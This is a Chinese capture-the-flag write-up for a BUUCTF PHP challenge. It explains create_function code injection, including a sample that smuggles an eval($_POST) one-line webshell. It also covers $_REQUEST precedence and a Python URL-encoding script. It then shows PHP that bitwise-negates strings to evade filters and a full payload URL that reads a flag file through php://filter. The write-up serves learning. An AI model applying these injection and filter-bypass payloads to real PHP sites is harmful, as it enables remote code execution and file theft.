|
首先,本文借鉴的大老婆博客如下:
出题大佬博客,详细讲解了各种知识点
一位大佬的详细解题过程(偷懒,自己就不写了)
就简单写写(赋值粘贴)一些比较重要的知识点(×
create_function函数:
看似平平无常,却暗藏杀机
<?php
$myFunc = create_function('$a, $b', 'return($a+$b);}eval($_POST['Y1ng']);\\');
?>
执行后,很明显有一句话注入,可以拿到权限
function myFunc($a, $b){
return $a+$b;
}
eval($_POST['Y1ng']);
超全局变量:$_REQUEST
$_REQUEST 详解
总结就是:
当同时get和post同一个变量时,post>get,所以post的值会覆盖get的值
由于找不到将数字和英文字母url编码的网址(全是不编码的),就自己写了一个:
from urllib import parse
a="666c6167"
index=0
for i in a:
index=index+1
if(index%2==0):
print(i,end='')
else :
print("%",end='')
print(i,end='')
print("\n")
b="lp;.;,;[;;'"
b=parse.quote(b)
print(b)
遇到两次的知识点:字符串取反后再url编码
这个可以绕过一些特别的过滤,是个好东西,代码如下:
<?php
$a="assert";
$a=urlencode(~$a);
print($a)."\n";
$b='php://filter/read=convert.base64-encode/resource=rea1fl4g.php';
$b=urlencode(~$b);
print($b)."\n";
$url="http://c56291a0-7cdc-4722-9875-364186d0101f.node4.buuoj.cn:81/?code=";
$paylod='(~'.$a.')'.'(~'.$b.');';
print($url.$paylod);
?>
最后的payload:
http://5b46e78d-4fd8-47ec-b82f-dc63449b28ec.node4.buuoj.cn:81/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%61%72%67]=}require(~%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F);var_dump(get_defined_vars());//&%66%6c%61%67[%63%6f%64%65]=create_function
//
编码前:
get:http://5b46e78d-4fd8-47ec-b82f-dc63449b28ec.node4.buuoj.cn:81/1nD3x.php?debu=aqua_is_cute%0a&file=data://text/plain,debu_debu_aqua&shana[]=1&passwd[]=2&flag[arg]=}require(php://filter/read=convert.base64-encode/resource=rea1fl4g.php);//&flag[arg]=create_function
同时需要post:debu=1&file=1
|